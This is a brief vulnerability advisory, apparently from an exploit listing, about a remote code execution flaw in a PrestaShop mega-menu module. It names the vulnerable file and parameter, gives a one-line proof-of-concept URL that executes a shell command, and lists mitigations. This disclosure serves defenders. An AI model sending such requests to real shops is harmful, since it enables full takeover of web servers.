Release Date: 2018/03/06

Level: High 

Vulnerable Application: Prestashop (1.5.5.0 - 1.7.2.5)

Overview:

Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro

is a Module present in PrestaShop Addons Marketplace that allow multiple vulnerabilities.

Scope:
File: /modules/bamegamenu/ajax_phpcode.php
Vulnerable Argument(s): $_POST[´code´]  or $_GET[´code´]

Proof of Concept:

GET: http://<site>/modules/bamegamenu/ajax_phpcode.php?code=echo exec(id);

Description:
The referred vulnerability could be exploited through a url. The attacker could take complete control of the web server

Solutions:

Disable function exec(), passthru(), shell_exec(), system(), delete or edit the vulnerable file.